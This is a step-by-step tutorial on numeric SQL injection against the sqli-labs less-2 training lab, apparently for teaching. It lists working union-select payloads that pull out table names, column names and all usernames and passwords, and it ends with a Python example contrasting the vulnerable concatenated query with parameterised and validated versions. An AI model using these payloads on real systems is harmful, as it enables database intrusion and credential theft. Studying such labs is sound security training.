Table of contents
Step 1: Determine whether the injection is numeric or character
Step 2: Use order by with a binary search to determine the number of columns in the query before the union
Step 3: Optimize the statement by changing the id to a number that does not exist
Step 4: Use a select statement to query the database name of the target machine
Step 5: Use a select statement to query all table names of the target machine
Step 6: Use a select statement to query all column names of the target machine
Step 7: Query all usernames and passwords
Take less-2 in sqli-labs as an example:
Step 1: Determine whether the injection is numeric or character
Enter a single quote (') to determine whether there is an injection point; if an error is reported, there is an injection point:
?id=1'
Use an and condition to determine whether the parameter is numeric or character.
With and 1=1 the page displays normally:
With and 1=2 the page does not display normally:
So this is numeric injection.
Step 2: Use order by with a binary search to determine the number of columns in the query before the union
Because this is numeric injection, there is no quote to close, so the closing character does not need to be considered at all.
?id=1 order by 3 --+
Step 3: Optimize the statement by changing the id to a number that does not exist
Reason for doing this:
By default, a union query only displays the results of the statement before the union. Changing the id to a number that does not exist makes the first statement return no rows, so the content of the statement after the union is displayed instead.
?id=-1 union select 1,2,3 --+
Step 4: Use the select statement to query the database name of the target machine
?id=-1 union select 1,2,database() --+
Step 5: Use the select statement to query all table names of the target machine
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
Step 6: Use the select statement to query all the column names of the target machine
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' --+
Step 7: Query all usernames and passwords
?id=-1 union select 1,group_concat(username,'~',password),3 from users --+
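The root cause of the whole chain above is that the id parameter is concatenated into the SQL text in a numeric context. The following is an added example, not code from the page or from sqli-labs: it models the less-2 query shape in SQLite (an assumption standing in for the lab's MySQL backend, with constructed sample rows), shows the step 1 and step 3 probes against the concatenated query, and shows the two fixes that stop them, type validation and parameter binding.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the lab's users table (sample rows, not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "pw-one"), (2, "bob", "pw-two")],
    )
    return conn


def lookup_vulnerable(conn, raw_id):
    """Assumed less-2 query shape: the value is spliced into the SQL with no quotes
    around it, so 'and 1=2' or a union arrives at the engine as SQL, not as data."""
    sql = f"SELECT id, username, password FROM users WHERE id={raw_id} LIMIT 1"
    return conn.execute(sql).fetchall()


def lookup_param_only(conn, raw_id):
    """Parameter binding alone: the whole input is one literal compared against id,
    so a payload can never be parsed as SQL. A payload simply matches no row."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (raw_id,)).fetchall()


def lookup_hardened(conn, raw_id):
    """Defence in depth: allow-list the type (digits only) and then bind the value.
    Malformed ids are rejected before any SQL is built, which is also the point
    where a server-side log entry or alert belongs."""
    if not isinstance(raw_id, str) or not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = build_db()
    # Step 1 probes: the concatenated query behaves differently for 1=1 and 1=2.
    print(lookup_vulnerable(db, "1 and 1=1"), lookup_vulnerable(db, "1 and 1=2"))
    # Step 3 probe (the '--+' in the URL decodes to '-- ', commenting out LIMIT).
    print(lookup_vulnerable(db, "-1 union select 1,2,3 -- "))
    # Same payload against the bound query: no rows, no union.
    print(lookup_param_only(db, "-1 union select 1,2,3 -- "))
```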